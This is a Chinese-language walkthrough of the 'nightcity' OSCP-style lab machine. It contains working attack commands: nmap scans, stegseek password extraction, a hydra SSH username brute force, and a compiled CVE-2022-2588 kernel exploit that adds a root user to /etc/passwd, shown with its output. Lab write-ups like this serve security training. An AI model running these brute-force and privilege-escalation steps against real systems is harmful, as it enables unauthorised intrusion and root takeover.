OSCP 靶场
靶场介绍
|
nightcity |
easy |
图片隐写、hydra 爆破、stegseek爆破、stegoVeritas工具使用、CVE-2022-2588 提权 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
┌──(root㉿kali)-[~/下载]
└─# nmap -sV -A -p- -T4 192.168.1.102
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-02 22:24 EST
Nmap scan report for 192.168.1.102
Host is up (0.0010s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Jun 09 2022 reminder [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.1.103
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ce:ac:1c:04:d6:f6:64:d6:d9:9d:88:c9:0d:66:a9:45 (RSA)
| 256 4f:f1:7b:69:5c:47:b2:91:b8:d2:2f:82:73:b7:fc:03 (ECDSA)
|_ 256 65:6b:3b:8c:89:81:4d:f3:98:98:5a:ed:57:cf:58:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: NightCity Web Server
MAC Address: 08:00:27:F0:5C:E9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.01 ms 192.168.1.102目录扫描
这里提示找robin 拿钥匙
访问robun 目录是如下内容。
frp 匿名访问如下提示:Local user is in the coordinates (本地用户在坐标中)
权限获取
从secret 目录中发现其中的图片存在隐藏,里面存在密码
stegseek most-wanted.jpg
┌──(root㉿kali)-[~/下载]
└─# cat most-wanted.jpg.out
VGhpc0lzVGhlUmVhbFBhc3N3MHJkIQ==
┌──(root㉿kali)-[~/下载]
└─# cat most-wanted.jpg.out | base64 -d
ThisIsTheRealPassw0rd!知道密码后,我们尝试对ssh 用户进行爆破,根据提示使用cewl 制作如下字典对用户进行爆破。但是失败了。
cewl http://192.168.1.102/robin > user.txt
重新使用字典进行爆破到ssh 用户名,成功获取权限。
hydra -L /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -p 'ThisIsTheRealPassw0rd!' ssh://192.168.1.102
登录后发现密码不对,里面存在一张图片,存在隐写信息
通过爆破没找到隐藏信息,使用stegoveritas 中找到flag信息
权限提升
这里发现存在隐藏账户,使用ThatMadeMeL4ugh! 切换到joker 用户
使用 https://github.com/Markakd/CVE-2022-2588 提权到root 权限,编译执行成功后会在passwd 文件写入用户
joker@NightCity:/tmp/CVE-2022-2588-master$ make
cc -O0 exp_file_credential.c -lpthread -o exp_file_credential
joker@NightCity:/tmp/CVE-2022-2588-master$ ls
exp_file_credential exp_file_credential.c Makefile README.md
joker@NightCity:/tmp/CVE-2022-2588-master$ chmod +x exp_file_credential
joker@NightCity:/tmp/CVE-2022-2588-master$ ./exp_file_credential
self path /tmp/CVE-2022-2588-master/./exp_file_credential
prepare done
Old limits -> soft limit= 14096 hard limit= 14096
starting exploit, num of cores: 1
defrag done
spray 256 done
freed the filter object
256 freed done
double free done
spraying files
found overlap, id : 13, 629
start slow write
closed overlap
got cmd, start spraying /etc/passwd
spray done
should be after the slow write
write done, spent 0.763729 s
succeedjoker@NightCity:/tmp/CVE-2022-2588-master/exp_dir$ su user
Contraseña:
user@NightCity:/tmp/CVE-2022-2588-master/exp_dir# whoami
user
user@NightCity:/tmp/CVE-2022-2588-master/exp_dir# id
uid=0(user) gid=0(root) grupos=0(root)
user@NightCity:/tmp/CVE-2022-2588-master/exp_dir#End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】nightcity
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论